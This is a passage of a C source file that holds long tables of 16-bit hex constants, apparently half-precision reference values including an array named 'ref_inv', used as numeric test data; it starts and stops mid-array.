0xb8ac, 0x2d3b, 0x340d, 0x2803, 0x2bc3, 0xb7d2, 0xacfd, 0x2b74, 0x318c, 0x34c7, 0x3240, 0xac47, 0x342d, 0xa3b0, 0xadd0, 0xacdd, 0x3548, 0x22a2, 0xb137, 0x3155, 0xb59a, 0xb41e, 0xb25b, 0xb275, 0xae09, 0x340d, 0xb70b, 0xb844, 0xb75c, 0xa344, 0xae6b, 0xb540, 0xb763, 0x2fb4, 0x384c, 0xaf0b, 0xb3e5, 0xb836, 0xb124, 0x395e, 0x3015, 0x320d, 0x3225, 0xb6eb, 0xb53f, 0xaa30, 0xb55e, 0xae84, 0x35a9, 0x24cf, 0x38cf, 0x9993, 0x257e, 0xa713, 0x3512, 0x35fd, 0xb808, 0x3455, 0xb491, 0xb5ae, 0x32c8, 0xb3a7, 0xad5a, 0xb022, 0x30b1, 0xb4bc, 0xb84c, 0x26bf, 0x2c34, 0x3505, 0x2890, 0xb6fb, 0x2579, 0xaeeb, 0xb29d, 0xb0f9, 0xb06d, 0x37e3, 0x3a11, 0xaf0b, 0x3171, 0xaaa9, 0x2f0b, 0xb66c, 0x2e34, 0x3239, 0xadd0, 0xb0fd, 0xb476, 0xa804, 0x34a4, 0xb727, 0x1e5a, 0x33b2, 0xaff5, 0xb3dc, 0xb8aa, 0x30bb, 0x2b73, 0xb470, 0xb468, 0x30a9, 0x328c, 0x267c, 0x3602, 0xb05c, 0xa262, 0x31ba, 0x38d7, 0xb3e1, 0x31bb, 0xb3bd, 0xac4c, 0xb6b7, 0xae02, 0x3558, 0x2eca, 0xb61d, 0xb16c, 0x2853, 0xb6e3, 0xb19b, 0x326e, 0x37ac, 0xb7b9, 0xb8af, 0xb3aa, 0x33fa, 0x3095, 0x2d0e, 0x2fad, 0x22ef, 0x351f, 0xb56d, 0xb0f6, 0xaefb, 0xb111, 0xa41f, 0x324d, 0xb417, 0x2d90, 0xb4d1, 0x24f2, 0xa5e6, 0x2cda, 0xae8c, 0x2e46, 0x33e7, 0xb462, 0x1fc8, 0xacfd, 0x2853, 0x296d, 0x34a4, 0x22d7, 0xb3a7, 0xa9ec, 0xb763, 0xae8c, 0x2803, 0x2eca, 0xaabc, 0xac3e, 0xb934, 0x2d53, 0xb0a5, 0xb25b, 0xaefb, 0x32b1, 0xa262, 0xb13f, 0x37e3, 0x32d7, 0x35a9, 0xb5ef, 0x3155, 0x351f, 0xb394, 0xb81d, 0x301c, 0x346c, 0xaca3, 0xb124, 0xaa93, 0x34c7, 0x326e, 0x3016, 0x33b2, 0x33a8, 0x30b1, 0x35dd, 0xaf0b, 0xb462, 0xb36b, 0xb1a0, 0xad4f, 0x30bc, 0xb043, 0x3512, 0xb610, 0x340d, 0x324d, 0x2d02, 0xb3e1, 0xaa8b, 0x3171, 0x3480, 0x9993, 0xaa87, 0xb083, 0x32c9, 0x2e09, 0xb416, 0x301e, 0x2890, 0xb37f, 0x320d, 0xa8fc, 0x342d, 0xb8af, 0xaff2, 0xb8aa, 0x1bad, 0x26bf, 0x303d, 0xb4a7, 0xb49d, 0xb70b, 0x2429, 0x3831, 0xadd0, 0xb4d6, 0x3455, 0x3639, 0xb75c, 0xb4d1, 0xb417, 0xac4c, 0x3811, 0xb66c, 0x35af, 0x2791, 0xac21, 0x3781, 0xb698, 0x2ffc, 0x328c, 0x301a, 0xaeeb, 0x315b, 0xb53f, 0x3535, 0xacdd, 0x3095, 0x3b47, 0xb470, 0xa190, 0x3678, 0xaad1, 0x3813, 0x3157, 0xb7d2, 0xb16c, 0xa1ef, 0xa804, 0xab3a, 0x32c8, 0xb5c2, 0xb540, 0x2cda, 0x340d, 0x3558, 0x33ce, 0x39a7, 0x364b, 0xab4e, 0x3478, 0xb41e, 0xb0f6, 0x37ed, 0xb05c, 0x363d, 0xb06d, 0xa9c9, 0xae84, 0x27ed, 0xb137, 0x22ef, 0x38ad, 0x3476, 0x306e, 0x2e0a, 0xada3, 0xb836, 0xb46a, 0x318c, 0xb19b, 0xb477, 0x1e5a, 0xb4b3, 0xb022, 0xaf3c, 0x384c, 0x33e7, 0x28cd, 0x312f, 0x2a9c, 0xb0bd, 0xb10b, 0xa713, 0xae1e, 0xae09, 0xa41f, 0xaf9d, 0x38d7, 0x245a, 0xaf0b, 0xb5d5, 0x38cf, 0x297f, 0x24fc, 0x2ca9, 0xaeae, 0xad74, 0x229d, 0x3505, 0x38b2, 0x3015, 0x30b5, 0xac47, 0xb7b9, 0xad00, 0xb3dc, 0x3417, 0xb84c, 0x2c08, 0x34ed, 0x35e5, 0xb33c, 0x336b, 0x3564, 0x3239, 0xaf43, 0xb808, 0x304f, 0xb844, 0x2d90, 0xb7ea, 0xb3bd, 0x383b, 0x2f0b, 0xb611, 0xb4bf, 0xac13, 0xb2ae, 0xab2a, 0xb46f, 0x30a9, 0x3142, 0x2579, 0x30fd, 0xb6eb, 0x3492, 0xadd0, 0x33fa, 0x30c2, 0x2b73, 0x19ef, 0x2e26, 0xb473, 0x3430, 0xb459, 0xb443, 0xb61d, 0xbaf5, 0xb476, 0xadb8, 0xb5ae, 0xb6e7, 0xae6b, 0xa5e6, 0x2d3b, 0xae02, 0xb445, 0xafcc, 0x3466, 0x391d, 0x37b4, 0x2e65, 0xb56d, 0xb052, 0x3602, 0x34ad, 0xb0f9, 0x2f72, 0xb55e, 0xb39e, 0x22a2, 0x2fad, 0xb671, 0xb48a, 0x3329, 0xb5ff, 0x9e14, 0x2a0a, 0xb7f3, 0x2b74, 0xb6e3, 0xa87d, 0xb727, 0xac8b, 0xad5a, 0xb068, 0x2fb4, 0x2e46, 0x2bc3, 0x34d2, 0xb224, 0xb4e2, 0x2950, 0x350d, 0x2d1d, 0xb275, 0xb111, 0xb395, 0x31ba, 0xafa9, 0x3a11, 0xb42f, 0x24cf, 0x334a, 0xb59a, 0x2d7c, 0xb8d7, 0xae83, 0xb1a5, 0x32a8, 0x3590, 0x395e, 0x2846, 0x3240, 0x37ac, 0xb1eb, 0xaff5, 0x28eb, 0xb4bc, 0xa75b, 0xb3e5, 0xb1bd, 0xb220, 0xb765, 0x90a7, 0x2033, 0x2f3e, 0x35fd, 0xb075, 0xb70b, 0xb417, 0x8f5e, 0x31bb, 0xaf8b, 0xaaa9, 0x3341, 0x257e, 0xb405, 0xabc5, 0x37c9, 0x3158, 0xb020, 0x1ad2, 0xb6fb, 0xa077, 0x3225, 0x327d, 0xa3b0, 0xb3aa, 0xac2a, 0x30bb, 0x2bdd, 0x2c34, 0x3101, 0x3596, 0x2e83, 0x3433, 0x35b4, 0xb113, 0xb0fd, 0x387a, 0xb491, 0xac86, 0xa344, 0x24f2, 0xb8ac, 0xb6b7, 0x2637, 0x2e34, 0x9ef1, 0x314e, 0xa551, 0x30ea, 0x2415, 0x3688, 0x267c, 0x334d, 0xb29d, 0xb4f6, 0xaa30, 0x37c1, 0x3548, 0x2d0e, 0xb74d, 0xb468, 0x340b, 0x3173, 0x2b31, 0xa8b8, 0x2c76, 0x1fc8, 0xb0a5, 0xaca3, 0xb043, 0x301e, 0x3831, 0x2ffc, 0xb7d2, 0xb41e, 0xb836, 0xa713, 0x3505, 0x3239, 0x30a9, 0xb61d, 0xb56d, 0xb7f3, 0x2d1d, 0x3590, 0x2f3e, 0x1ad2, 0xb113, 0x3688, 0x1fc8, 0xaca3, 0x301e, 0x2ffc, 0xb41e, 0xa713, 0x3239, 0xb61d, 0xb7f3, 0x3590, 0x1ad2, 0x3688, 0xb25b, 0x3512, 0xadd0, 0xb16c, 0xb46a, 0x38b2, 0x3142, 0xb052, 0xb275, 0x35fd, 0xb0fd, 0xb0a5, 0xb043, 0x3831, 0xb7d2, 0xb836, 0x3505, 0x30a9, 0xb56d, 0x2d1d, 0x2f3e, 0xb113, 0xacfd, 0xb124, 0x2890, 0x328c, 0xb0f6, 0xae1e, 0xaf43, 0xbaf5, 0x2b74, 0x395e, 0xb6fb, 0x267c, 0x1fc8, 0xb043, 0x2ffc, 0xb836, 0x3239, 0xb56d, 0x3590, 0xb113, 0xb25b, 0x2890, 0xb16c, 0xae1e, 0x3142, 0x2b74, 0x35fd, 0x267c, 0xaa93, 0xb4d6, 0x37ed, 0x3015, 0xb476, 0xb111, 0xa077, 0xb0a5, 0x301e, 0xb7d2, 0xa713, 0x30a9, 0xb7f3, 0x2f3e, 0x3688, 0xb124, 0xadd0, 0xb0f6, 0x38b2, 0xbaf5, 0xb275, 0xb6fb, 0x2853, 0xb610, 0x301a, 0x318c, 0xb808, 0x3602, 0x2846, 0x387a, 0xaca3, 0x3831, 0xb41e, 0x3505, 0xb61d, 0x2d1d, 0x1ad2, 0xacfd, 0x3512, 0x328c, 0xb46a, 0xaf43, 0xb052, 0x395e, 0xb0fd, 0xaefb, 0xb37f, 0xa1ef, 0xae09, 0x2579, 0xb6e3, 0xb075, 0x334d, 0x1fc8, 0x301e, 0xb41e, 0x3239, 0xb7f3, 0x1ad2, 0xb25b, 0xadd0, 0xb46a, 0x3142, 0xb275, 0xb0fd, 0xaa93, 0x301a, 0xae09, 0xb476, 0x2846, 0x334d, 0x340d, 0xa804, 0x30b5, 0x34ad, 0xb70b, 0xb0a5, 0x3831, 0xb836, 0x30a9, 0x2d1d, 0xb113, 0xb124, 0x328c, 0xae1e, 0xbaf5, 0x395e, 0x267c, 0xb610, 0xa1ef, 0x3015, 0x3602, 0xb075, 0x296d, 0x320d, 0xb05c, 0x304f, 0xa87d, 0x3225, 0xaca3, 0x2ffc, 0xa713, 0xb61d, 0x3590, 0x3688, 0x3512, 0xb16c, 0x38b2, 0xb052, 0x35fd, 0x2853, 0xb37f, 0x37ed, 0xb808, 0xb6e3, 0xa077, 0x32b1, 0x3455, 0xb19b, 0x30fd, 0xb395, 0xb491, 0xb043, 0xb7d2, 0x3505, 0xb56d, 0x2f3e, 0xacfd, 0x2890, 0xb0f6, 0xaf43, 0x2b74, 0xb6fb, 0xaefb, 0xb4d6, 0x318c, 0x2579, 0xb111, 0x387a, 0x34c7, 0xaeeb, 0xa41f, 0xadb8, 0x3240, 0xb29d, 0x1fc8, 0xb7d2, 0xb61d, 0xb113, 0xadd0, 0xaf43, 0x35fd, 0xb610, 0xae09, 0xb111, 0x32b1, 0xb05c, 0x34ad, 0xb29d, 0x315b, 0xb6eb, 0x327d, 0x342d, 0xb7b9, 0xb1eb, 0x33b2, 0xb4b3, 0xad5a, 0xb0a5, 0xb41e, 0xb56d, 0x3688, 0x328c, 0x3142, 0xb6fb, 0xb37f, 0x3015, 0x2846, 0x34c7, 0xb19b, 0xa87d, 0x34a4, 0xab3a, 0xb5ae, 0xac86, 0xb75c, 0x2d90, 0x8f5e, 0xb3e1, 0x245a, 0x3a11, 0xaca3, 0xb836, 0xb7f3, 0xacfd, 0xb16c, 0xbaf5, 0xb0fd, 0xb4d6, 0xb808, 0xb075, 0x340d, 0xa41f, 0xb395, 0xa262, 0x363d, 0xb0f9, 0xb4f6, 0xb53f, 0x3492, 0xa3b0, 0xb8af, 0xad00, 0xaff5, 0xb043, 0xa713, 0x2d1d, 0xb25b, 0xb0f6, 0xb052, 0x267c, 0x301a, 0x2579, 0xa077, 0x320d, 0x30b5, 0x3240, 0x326e, 0xb477, 0xb727, 0x22d7, 0x32c8, 0xb6e7, 0xa344, 0xb4d1, 0xb7ea, 0x31bb, 0x301e, 0x3505, 0x3590, 0xb124, 0xb46a, 0x2b74, 0x2853, 0xa1ef, 0xb476, 0x387a, 0x3455, 0x304f, 0xb70b, 0x324d, 0xaf9d, 0x31ba, 0xb13f, 0xb06d, 0x2f72, 0xaa30, 0x3535, 0xadd0, 0xb3aa, 0x3831, 0x3239, 0x2f3e, 0x3512, 0xae1e, 0xb275, 0xaefb, 0x37ed, 0x3602, 0x334d, 0xaeeb, 0x30fd, 0x3225, 0xa8fc, 0xac47, 0x37ac, 0x3016, 0x1e5a, 0xac8b, 0xb3a7, 0xb5c2, 0xae6b, 0x24f2, 0x2ffc, 0x30a9, 0x1ad2, 0x2890, 0x38b2, 0x395e, 0xaa93, 0x318c, 0xb6e3, 0x296d, 0xa804, 0xadb8, 0xb491, 0x3639, 0xb844, 0xb417, 0x2d02, 0x38d7, 0xafa9, 0x37e3, 0xa9c9, 0xb55e, 0x37c1, 0x1fc8, 0xb7f3, 0xb46a, 0xaa93, 0x2846, 0x30b5, 0xa8fc, 0x327d, 0x3492, 0x3535, 0x37c1, 0xb39e, 0x27ed, 0xb5ef, 0x334a, 0x297f, 0xaa87, 0xb405, 0xac13, 0xac21, 0xa551, 0x37b4, 0x3478, 0xb0a5, 0x2d1d, 0xae1e, 0xb610, 0xb075, 0x304f, 0x3639, 0xac86, 0xb6e7, 0xb5c2, 0xa9ec, 0xb068, 0xaf3c, 0x35dd, 0xa75b, 0x2c08, 0x303d, 0x3101, 0xb473, 0xaad1, 0x2b31, 0x9e14, 0xada3, 0xaca3, 0x3590, 0x38b2, 0xb37f, 0xa077, 0x30fd, 0x315b, 0xb4f6, 0x2f72, 0xa9c9, 0x32d7, 0xb42f, 0xb5d5, 0x3480, 0x3341, 0xb611, 0x35af, 0x9ef1, 0x3466, 0x364b, 0xb934, 0x2950, 0xb10b, 0xb043, 0x2f3e, 0xaf43, 0xb4d6, 0x387a, 0xadb8, 0xab3a, 0x22d7, 0xac8b, 0xb4b3, 0x33a8, 0x28eb, 0x3417, 0x1bad, 0x2bdd, 0x19ef, 0xa190, 0x340b, 0x3329, 0x306e, 0x301c, 0xb1a5, 0x229d, 0x301e, 0x1ad2, 0x3142, 0x301a, 0x334d, 0x34ad, 0x363d, 0xb13f, 0xafa9, 0x245a, 0xaa8b, 0xaf8b, 0x383b, 0x3811, 0x2637, 0xb445, 0x33ce, 0xaabc, 0xb224, 0x2a9c, 0xad4f, 0x90a7, 0x3564, 0x3831, 0xb113, 0xbaf5, 0xa1ef, 0x296d, 0xa87d, 0xb477, 0x3016, 0xb1eb, 0xad00, 0xaff2, 0xac2a, 0x30c2, 0x3b47, 0xb74d, 0xb671, 0x38ad, 0xb394, 0xb8d7, 0xaeae, 0x2e09, 0x3158, 0xb46f, 0x2ffc, 0x3688, 0xb052, 0x37ed, 0x32b1, 0xb395, 0xaf9d, 0x2d02, 0x8f5e, 0xb7ea, 0xb417, 0xb8ac, 0x2d3b, 0x340d, 0x2803, 0x2bc3, 0x28cd, 0xb36b, 0xb220, 0xb33c, 0xb70b, 0x3433, 0xb443, 0xb7d2, 0xacfd, 0x2b74, 0x318c, 0x34c7, 0x3240, 0xac47, 0x342d, 0xa3b0, 0xadd0, 0xacdd, 0x3548, 0x22a2, 0xb137, 0x3155, 0xb59a, 0x24fc, 0xb083, 0xabc5, 0xb2ae, 0x3781, 0x30ea, 0x2e65, 0xb41e, 0xb25b, 0xb275, 0xae09, 0x340d, 0xb70b, 0xb844, 0xb75c, 0xa344, 0xae6b, 0xb540, 0xb763, 0x2fb4, 0x384c, 0xaf0b, 0xb3e5, 0x34ed, 0xb4a7, 0x3596, 0x3430, 0x3813, 0xa8b8, 0x2a0a, 0xb836, 0xb124, 0x395e, 0x3015, 0x320d, 0x3225, 0xb6eb, 0xb53f, 0xaa30, 0xb55e, 0xae84, 0x35a9, 0x24cf, 0x38cf, 0x9993, 0x257e, 0xb4bf, 0x2791, 0x314e, 0x391d, 0xab4e, 0x2d53, 0x350d, 0xa713, 0x3512, 0x35fd, 0xb808, 0x3455, 0xb491, 0xb5ae, 0x32c8, 0xb3a7, 0xad5a, 0xb022, 0x30b1, 0xb4bc, 0xb84c, 0x26bf, 0x2c34, 0x2e26, 0x3678, 0x3173, 0xb5ff, 0x2e0a, 0x346c, 0x32a8, 0x3505, 0x2890, 0xb6fb, 0x2579, 0xaeeb, 0xb29d, 0xb0f9, 0xb06d, 0x37e3, 0x3a11, 0xaf0b, 0x3171, 0xaaa9, 0x2f0b, 0xb66c, 0x2e34, 0xafcc, 0x39a7, 0xac3e, 0xb4e2, 0xb0bd, 0x30bc, 0x2033, 0x3239, 0xadd0, 0xb0fd, 0xb476, 0xa804, 0x34a4, 0xb727, 0x1e5a, 0x33b2, 0xaff5, 0xb3dc, 0xb8aa, 0x30bb, 0x2b73, 0xb470, 0xb468, 0xb48a, 0x3476, 0xb81d, 0xae83, 0xad74, 0xb416, 0xb020, 0x30a9, 0x328c, 0x267c, 0x3602, 0xb05c, 0xa262, 0x31ba, 0x38d7, 0xb3e1, 0x31bb, 0xb3bd, 0xac4c, 0xb6b7, 0xae02, 0x3558, 0x2eca, 0x34d2, 0x312f, 0xb1a0, 0xb765, 0x336b, 0x2429, 0x35b4, 0xb61d, 0xb16c, 0x2853, 0xb6e3, 0xb19b, 0x326e, 0x37ac, 0xb7b9, 0xb8af, 0xb3aa, 0x33fa, 0x3095, 0x2d0e, 0x2fad, 0x22ef, 0x351f, 0x2d7c, 0x2ca9, 0x32c9, 0x37c9, 0xab2a, 0xb698, 0x2415, 0xb56d, 0xb0f6, 0xaefb, 0xb111, 0xa41f, 0x324d, 0xb417, 0x2d90, 0xb4d1, 0x24f2, 0xa5e6, 0x2cda, 0xae8c, 0x2e46, 0x33e7, 0xb462, 0xb1bd, 0x35e5, 0xb49d, 0x2e83, 0xb459, 0x3157, 0x2c76, 0x1fc8, 0xacfd, 0x2853, 0x296d, 0x34a4, 0x22d7, 0xb3a7, 0xa9ec, 0xb763, 0xae8c, 0x2803, 0x2eca, 0xaabc, 0xac3e, 0xb934, 0x2d53, 0xa7c8, 0xb3af, 0x3359, 0x9d48, 0xb29d, 0xb550, 0xb759, 0xb0a5, 0xb25b, 0xaefb, 0x32b1, 0xa262, 0xb13f, 0x37e3, 0x32d7, 0x35a9, 0xb5ef, 0x3155, 0x351f, 0xb394, 0xb81d, 0x301c, 0x346c, 0xb430, 0x2dac, 0x3148, 0xae16, 0x2b66, 0xb444, 0x35fc, 0xaca3, 0xb124, 0xaa93, 0x34c7, 0x326e, 0x3016, 0x33b2, 0x33a8, 0x30b1, 0x35dd, 0xaf0b, 0xb462, 0xb36b, 0xb1a0, 0xad4f, 0x30bc, 0x29e0, 0x18c1, 0xfbd, 0x299b, 0x2da1, 0xb5d6, 0x340b, 0xb043, 0x3512, 0xb610, 0x340d, 0x324d, 0x2d02, 0xb3e1, 0xaa8b, 0x3171, 0x3480, 0x9993, 0xaa87, 0xb083, 0x32c9, 0x2e09, 0xb416, 0x30be, 0xb581, 0x298e, 0xaec2, 0xb80b, 0x3031, 0xb206, 0x301e, 0x2890, 0xb37f, 0x320d, 0xa8fc, 0x342d, 0xb8af, 0xaff2, 0xb8aa, 0x1bad, 0x26bf, 0x303d, 0xb4a7, 0xb49d, 0xb70b, 0x2429, 0x30a4, 0xb52a, 0xa93e, 0xa7a3, 0xad07, 0x24b1, 0xb925, 0x3831, 0xadd0, 0xb4d6, 0x3455, 0x3639, 0xb75c, 0xb4d1, 0xb417, 0xac4c, 0x3811, 0xb66c, 0x35af, 0x2791, 0xac21, 0x3781, 0xb698, 0x3033, 0xb398, 0x3444, 0x35ba, 0xaaea, 0x3133, 0xb6e3, 0x2ffc, 0x328c, 0x301a, 0xaeeb, 0x315b, 0xb53f, 0x3535, 0xacdd, 0x3095, 0x3b47, 0xb470, 0xa190, 0x3678, 0xaad1, 0x3813, 0x3157, 0xb541, 0x1e84, 0xa88c, 0x34bf, 0x3867, 0xb0a0, 0xb003, 0xb7d2, 0xb16c, 0xa1ef, 0xa804, 0xab3a, 0x32c8, 0xb5c2, 0xb540, 0x2cda, 0x340d, 0x3558, 0x33ce, 0x39a7, 0x364b, 0xab4e, 0x3478, 0xa4ed, 0x2cff, 0x344a, 0xb145, 0xb141, 0x2f80, 0xb7f5, 0xb41e, 0xb0f6, 0x37ed, 0xb05c, 0x363d, 0xb06d, 0xa9c9, 0xae84, 0x27ed, 0xb137, 0x22ef, 0x38ad, 0x3476, 0x306e, 0x2e0a, 0xada3, 0x276a, 0x3757, 0xb3c3, 0xad53, 0xb17c, 0x353e, 0xad43, 0xb836, 0xb46a, 0x318c, 0xb19b, 0xb477, 0x1e5a, 0xb4b3, 0xb022, 0xaf3c, 0x384c, 0x33e7, 0x28cd, 0x312f, 0x2a9c, 0xb0bd, 0xb10b, 0x3322, 0x3575, 0x2dc6, 0xb3fa, 0xb6e5, 0x29a0, 0x33e4, 0xa713, 0xae1e, 0xae09, 0xa41f, 0xaf9d, 0x38d7, 0x245a, 0xaf0b, 0xb5d5, 0x38cf, 0x297f, 0x24fc, 0x2ca9, 0xaeae, 0xad74, 0x229d, 0xb65d, 0xb441, 0x2f68, 0xb42f, 0xb656, 0x9955, 0xab8a, 0x3505, 0x38b2, 0x3015, 0x30b5, 0xac47, 0xb7b9, 0xad00, 0xb3dc, 0x3417, 0xb84c, 0x2c08, 0x34ed, 0x35e5, 0xb33c, 0x336b, 0x3564, 0xb1a0, 0x3504, 0xb05d, 0xb03b, 0x3901, 0x3124, 0x3846, 0x3239, 0xaf43, 0xb808, 0x304f, 0xb844, 0x2d90, 0xb7ea, 0xb3bd, 0x383b, 0x2f0b, 0xb611, 0xb4bf, 0xac13, 0xb2ae, 0xab2a, 0xb46f, 0xb842, 0x3128, 0xb11c, 0x2374, 0x3013, 0xb4f8, 0x3aac, 0x30a9, 0x3142, 0x2579, 0x30fd, 0xb6eb, 0x3492, 0xadd0, 0x33fa, 0x30c2, 0x2b73, 0x19ef, 0x2e26, 0xb473, 0x3430, 0xb459, 0xb443, 0x351a, 0xac63, 0x318e, 0xb290, 0x2d85, 0xb6c3, 0x26af, 0xb61d, 0xbaf5, 0xb476, 0xadb8, 0xb5ae, 0xb6e7, 0xae6b, 0xa5e6, 0x2d3b, 0xae02, 0xb445, 0xafcc, 0x3466, 0x391d, 0x37b4, 0x2e65, 0xb0a3, 0x349a, 0x2a41, 0x3539, 0xb001, 0x3400, 0x2785, 0xb56d, 0xb052, 0x3602, 0x34ad, 0xb0f9, 0x2f72, 0xb55e, 0xb39e, 0x22a2, 0x2fad, 0xb671, 0xb48a, 0x3329, 0xb5ff, 0x9e14, 0x2a0a, 0xb43e, 0xb005, 0x3447, 0x366f, 0xb0a0, 0xb4e5, 0x3a39, 0xb7f3, 0x2b74, 0xb6e3, 0xa87d, 0xb727, 0xac8b, 0xad5a, 0xb068, 0x2fb4, 0x2e46, 0x2bc3, 0x34d2, 0xb224, 0xb4e2, 0x2950, 0x350d, 0x23df, 0xb41c, 0x30ba, 0xb359, 0xad1d, 0xb657, 0xb2ea, 0x2d1d, 0xb275, 0xb111, 0xb395, 0x31ba, 0xafa9, 0x3a11, 0xb42f, 0x24cf, 0x334a, 0xb59a, 0x2d7c, 0xb8d7, 0xae83, 0xb1a5, 0x32a8, 0x3209, 0x3819, 0x9779, 0x36d7, 0x2d41, 0xacd6, 0xb9b4, 0x3590, 0x395e, 0x2846, 0x3240, 0x37ac, 0xb1eb, 0xaff5, 0x28eb, 0xb4bc, 0xa75b, 0xb3e5, 0xb1bd, 0xb220, 0xb765, 0x90a7, 0x2033, 0xaf98, 0x3713, 0xaf0c, 0x2da9, 0x361d, 0x1f42, 0xb6a8, 0x2f3e, 0x35fd, 0xb075, 0xb70b, 0xb417, 0x8f5e, 0x31bb, 0xaf8b, 0xaaa9, 0x3341, 0x257e, 0xb405, 0xabc5, 0x37c9, 0x3158, 0xb020, 0x3181, 0x2c5a, 0x3110, 0xa63e, 0x219d, 0x2955, 0x2b0f, 0x1ad2, 0xb6fb, 0xa077, 0x3225, 0x327d, 0xa3b0, 0xb3aa, 0xac2a, 0x30bb, 0x2bdd, 0x2c34, 0x3101, 0x3596, 0x2e83, 0x3433, 0x35b4, 0xb017, 0xa8e7, 0x348a, 0x3503, 0xa3b5, 0x3310, 0xb55c, 0xb113, 0xb0fd, 0x387a, 0xb491, 0xac86, 0xa344, 0x24f2, 0xb8ac, 0xb6b7, 0x2637, 0x2e34, 0x9ef1, 0x314e, 0xa551, 0x30ea, 0x2415, 0xb4c7, 0xb615, 0xb172, 0x347a, 0xae42, 0xa933, 0x367b, 0x3688, 0x267c, 0x334d, 0xb29d, 0xb4f6, 0xaa30, 0x37c1, 0x3548, 0x2d0e, 0xb74d, 0xb468, 0x340b, 0x3173, 0x2b31, 0xa8b8, 0x2c76, 0xb79e, 0x380c, 0x3290, 0xb49f, 0xa856, 0x358d, 0x381c }; static const uint16_t ref_inv[709] = { 0x4000, 0x39a8, 0xb9a8, 0x39a8, 0x39a8, 0x3a70, 0x380c, 0xb4f8, 0xb4f8, 0x3a70, 0x380c, 0x380c, 0xb4f8, 0x3a70, 0xc680, 0x3e00, 0x3800, 0x3a00, 0x3e00, 0x3800, 0xb800, 0xb400, 0x3800, 0xb800, 0x3800, 0xb400, 0x3a00, 0xb400, 0xb400, 0x3000, 0x3d39, 0xc126, 0xc2fa, 0xbc19, 0x423c, 0x42b7, 0x41ab, 0xb225, 0xba5b, 0x402a, 0xb37e, 0xbc20, 0xbcf3, 0x3d46, 0xb7b9, 0x4039, 0x4304, 0x3de1, 0xc371, 0xc164, 0xc2ca, 0x38e7, 0xbdfd, 0xc369, 0xbf4d, 0x4299, 0x4415, 0x3fa8, 0x3a3d, 0x3d49, 0xb048, 0xb9bc, 0xb3f0, 0xbd88, 0xad92, 0xbd65, 0xb581, 0x3fac, 0x3f23, 0xb183, 0xb637, 0xbeb9, 0x2bdd, 0x3a0a, 0xbd79, 0x25af, 0x38cf, 0xb5b0, 0x3e2b, 0x3c03, 0xc436, 0x3d33, 0x3d5a, 0xbaf8, 0x3e1e, 0x3935, 0xb43a, 0x3f5e, 0xc55c, 0x40fd, 0x40cc, 0xbe16, 0x3f32, 0xb85f, 0xbb8e, 0x3612, 0xbb87, 0x37a4, 0x30e9, 0x394f, 0xb1e4, 0xb755, 0xacc2, 0xab0b, 0x4376, 0xc064, 0xba93, 0x2ef9, 0xbbf1, 0x3070, 0x391f, 0xbb72, 0xc3b9, 0x4220, 0x3c2d, 0xbba1, 0x3b7f, 0xb4f5, 0x3c4d, 0x3471, 0xc0f4, 0x3f60, 0xb93a, 0xbc72, 0x403d, 0xb5e4, 0x351d, 0x3593, 0x3477, 0x3821, 0xbd90, 0xa96e, 0xb42f, 0x3920, 0xb897, 0xbfd7, 0x48a5, 0xc510, 0xbe2d, 0x41b5, 0xc212, 0x3564, 0x3326, 0x39d8, 0x3e33, 0xbc5a, 0xbcd1, 0x399b, 0x3a72, 0x357c, 0xc043, 0x37b8, 0xb9ea, 0xb79c, 0x3949, 0xb953, 0x3abf, 0x25a2, 0x32a2, 0x2e5f, 0x35fc, 0x3e35, 0xb70b, 0x39b6, 0x3c2d, 0xbf26, 0xbd47, 0xb7a8, 0x3a9b, 0x269a, 0xc1ef, 0xc11c, 0xb383, 0xbf16, 0x448f, 0x42e2, 0x39fa, 0xbdac, 0x3cb7, 0xbfc7, 0xc02c, 0x2a4b, 0xb9a4, 0x40b9, 0x3dc3, 0x3dee, 0xb7dc, 0x38a2, 0x3ee2, 0xb77d, 0x3cb2, 0x3f4c, 0xc066, 0xc07e, 0xb8e2, 0x41e8, 0xbf9a, 0x3a20, 0x3d6a, 0xb830, 0x3f4e, 0xbe6b, 0xc0a9, 0xb9c8, 0x3d7a, 0xb9fd, 0x3567, 0x3cd4, 0xbedf, 0xbd9c, 0x3472, 0x3d70, 0x2ca4, 0xbdba, 0x3d84, 0x3529, 0x3cca, 0x3a5c, 0x3c05, 0xbfc9, 0xb933, 0xb242, 0x31e0, 0xb9a3, 0x3967, 0x4132, 0xc0ec, 0x9c24, 0x35d4, 0x351a, 0x3beb, 0x3163, 0xc133, 0x38b3, 0xc00d, 0x355f, 0xb6b4, 0x391b, 0x4148, 0x391f, 0x3fca, 0xae5e, 0xb436, 0xb3db, 0xb48c, 0xb6bd, 0xb11b, 0xbd07, 0xb9c6, 0x33ad, 0x37a8, 0xb081, 0x34c2, 0x3bdc, 0x389a, 0x45a5, 0xc242, 0xbe8d, 0x3724, 0xb9b2, 0x3c18, 0x3a44, 0xc5bc, 0xa46e, 0xc35a, 0x3a7b, 0x39a8, 0x4021, 0x45f5, 0x1ed3, 0x3e64, 0xbd9f, 0xb556, 0xb8e9, 0xbba8, 0x3a52, 0x3d79, 0xbde4, 0x38f5, 0xc19f, 0x342c, 0x33ea, 0x3b84, 0x3f56, 0x3b41, 0x4432, 0xc3a1, 0xbd19, 0x3551, 0x3384, 0x3df7, 0x3cb6, 0xc4c2, 0x3139, 0xc1f2, 0x38b4, 0xb0a9, 0x3ce1, 0x4593, 0x2ee6, 0xc63a, 0x433e, 0x387e, 0xad95, 0x390b, 0xbee2, 0xba2b, 0x4611, 0x394b, 0x4459, 0xba64, 0xb8ce, 0xc1bf, 0xc645, 0xb5a0, 0xc152, 0x3da8, 0x356e, 0xb05c, 0x39bf, 0xbce0, 0xb97d, 0x422a, 0x380c, 0x4025, 0xb134, 0x3025, 0xbd29, 0xc1f9, 0xb4c2, 0xc023, 0x3951, 0xba8c, 0x3b15, 0x3a8f, 0xb9c5, 0xb5e3, 0x4057, 0x38a6, 0x3ba3, 0x29d1, 0xb1cd, 0xbf23, 0xb899, 0xb974, 0x35b8, 0x3e54, 0x39c3, 0xb369, 0xb4ea, 0x321c, 0x295f, 0xb7f3, 0xbc60, 0x3c12, 0xba76, 0xb350, 0x3be2, 0xb9c4, 0x3ba2, 0x3a8a, 0xbe30, 0xba5b, 0x3588, 0x3914, 0x3674, 0x389f, 0xbd4b, 0x1f16, 0xbe79, 0x35da, 0x3835, 0xb562, 0x3e69, 0xbc55, 0xbe66, 0x4006, 0x3ce4, 0xba9a, 0xb1ae, 0xa574, 0xbb7d, 0x3f40, 0xb670, 0x3cc2, 0x2d78, 0xb272, 0x3ad3, 0xc128, 0xb8a3, 0x3e12, 0xb81b, 0x3bcd, 0xb3b6, 